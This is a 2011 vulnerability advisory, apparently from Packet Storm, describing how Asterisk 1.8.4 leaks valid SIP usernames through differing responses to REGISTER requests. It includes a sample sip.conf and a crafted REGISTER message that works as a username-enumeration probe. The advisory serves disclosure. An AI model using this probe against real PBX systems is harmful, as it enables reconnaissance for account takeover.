Asterisk 1.8.4 SIP Username Enumeration

2011-05-26T00:00:00
ID PACKETSTORM:101720
Type packetstorm
Reporter Francesco Tornieri
Modified 2011-05-26T00:00:00

Description

                                        
                                            `Asterisk, sip response permit username identification through use REGISTER   
  
Author: francesco.tornieri \"At\" verona-wireless.net   
Summary: Sip responses permit user identification  
Release Date: 25/05/2011  
Criticality level: Low  
Impact: Information leak  
Software: Asterisk 1.8.4 (I try it to an Asterisk 1.6.2.16.2 but it generates a timeout)  
  
Description:  
It's possible to enumerate valide sip username through use of REGISTER method (a similar problem has been fixed by Digium in 2009 and has been described in this document http://downloads.asterisk.org/pub/security/AST-2009-003.html).  
  
Example:  
PBX Asterisk:  
----------  
sip.conf  
----------  
[general]  
context=outgoing  
port=5060  
bindaddr=192.168.2.1  
realm=asterisk  
allowguest=no   
alwaysauthreject=yes <----  
  
[template](!)  
type=friend  
canreinvite=no  
host=dynamic  
qualify=1000  
disallow=all  
allow=g729  
  
[100](template)  
callerid=phone100<100>  
username=100  
secret=password  
  
[500](template)  
callerid=phone200<500>  
username=500  
secret=password  
  
------------------------  
Craft Sip REGISTER example  
------------------------  
REGISTER sip:192.168.2.1 SIP/2.0  
CSeq: 123 REGISTER  
Via: SIP/2.0/UDP localhost:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport  
User-Agent: TT  
From: <sip:500@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a  
Call-ID: 2e2f07e0499cec3abf7045ef3610f0f2  
To: <sip:500@192.168.2.1>  
Refer-To: sip:500@192.168.2.1  
Contact: <sip:500@localhost>;q=1  
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING  
Expires: 3600  
Content-Length: 28000  
Max-Forwards: 70  
  
----------------  
Method: REGISTER   
----------------  
Valid user (user 500)  
Response:   
---  
Received: SIP/2.0 401 Unauthorized  
---  
  
Invalid user (user 501)  
Response:  
---  
Received: SIP/2.0 100 Trying  
---  
  
Francesco Tornieri  
  
`